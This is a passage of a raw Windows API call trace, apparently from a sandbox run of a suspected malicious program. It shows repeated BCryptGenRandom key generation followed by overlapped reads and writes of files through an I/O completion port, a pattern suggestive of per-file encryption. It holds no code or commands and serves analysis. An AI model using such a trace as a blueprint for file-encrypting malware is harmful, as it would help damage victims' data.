dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.418] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.418] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.418] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.418] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.419] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.419] free (_Block=0x3e305b8) [0196.419] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.419] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.419] free (_Block=0x1fa91d0) [0196.419] free (_Block=0x1fa2ed8) [0196.419] free (_Block=0x1fa90b8) [0196.419] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.420] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.421] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.432] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2068, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.434] CloseHandle (hObject=0x170) returned 1 [0196.434] free (_Block=0x3df0008) [0196.434] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.462] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.462] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.462] free (_Block=0x3e305b8) [0196.462] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.462] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.462] free (_Block=0x1fa91d0) [0196.462] free (_Block=0x1fa2ed8) [0196.462] free (_Block=0x1fa90b8) [0196.462] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.463] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.464] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.464] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.484] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1426, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.485] CloseHandle (hObject=0x170) returned 1 [0196.485] free (_Block=0x3df0008) [0196.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.495] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.496] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.496] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.496] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.496] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.496] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.496] free (_Block=0x3e305b8) [0196.496] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.496] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.497] free (_Block=0x1fa91d0) [0196.497] free (_Block=0x1fa2ed8) [0196.497] free (_Block=0x1fa90b8) [0196.497] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.504] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4d40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.505] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.505] CloseHandle (hObject=0x170) returned 1 [0196.505] free (_Block=0x3df0008) [0196.505] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.515] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.515] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.515] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.515] free (_Block=0x3e305b8) [0196.515] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.515] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.516] free (_Block=0x1fa91d0) [0196.516] free (_Block=0x1fa2ed8) [0196.516] free (_Block=0x1fa90b8) [0196.516] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.524] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7020, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.525] CloseHandle (hObject=0x170) returned 1 [0196.526] free (_Block=0x3df0008) [0196.526] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.534] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.535] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.535] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.536] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.536] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.536] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.536] free (_Block=0x3e305b8) [0196.536] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.536] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.537] free (_Block=0x1fa91d0) [0196.537] free (_Block=0x1fa2ed8) [0196.537] free (_Block=0x1fa90b8) [0196.537] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.545] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.546] CloseHandle (hObject=0x170) returned 1 [0196.546] free (_Block=0x3df0008) [0196.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.555] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.555] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.555] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.556] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.556] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.556] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.556] free (_Block=0x3e305b8) [0196.556] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.556] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.557] free (_Block=0x1fa91d0) [0196.557] free (_Block=0x1fa2ed8) [0196.557] free (_Block=0x1fa90b8) [0196.557] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.567] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.568] CloseHandle (hObject=0x170) returned 1 [0196.568] free (_Block=0x3df0008) [0196.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.579] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.579] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.579] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.579] free (_Block=0x3e305b8) [0196.579] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.579] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.580] free (_Block=0x1fa91d0) [0196.580] free (_Block=0x1fa2ed8) [0196.580] free (_Block=0x1fa90b8) [0196.580] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.581] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x2f70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.582] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.632] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1b3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.642] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.650] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x31da, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0196.662] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.671] CloseHandle (hObject=0x2a4) returned 1 [0196.706] free (_Block=0x3f70048) [0196.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.737] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.737] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.738] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.738] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.738] free (_Block=0x3e305b8) [0196.738] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.738] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.739] free (_Block=0x1fa91d0) [0196.739] free (_Block=0x1fa2ed8) [0196.739] free (_Block=0x1fa90b8) [0196.739] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0196.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.741] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.741] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.742] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0196.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.743] CloseHandle (hObject=0x338) returned 1 [0196.744] free (_Block=0x3e70008) [0196.744] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.747] ReadFile (in: hFile=0x330, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x8ec4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0196.748] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.761] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf5e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.761] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.762] CloseHandle (hObject=0x330) returned 1 [0196.762] free (_Block=0x3df0008) [0196.762] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.794] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.794] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.795] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.795] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.795] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.795] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.795] free (_Block=0x3e305b8) [0196.795] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.795] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.796] free (_Block=0x1fa91d0) [0196.796] free (_Block=0x1fa2ed8) [0196.796] free (_Block=0x1fa90b8) [0196.796] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.796] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.811] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3420, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, 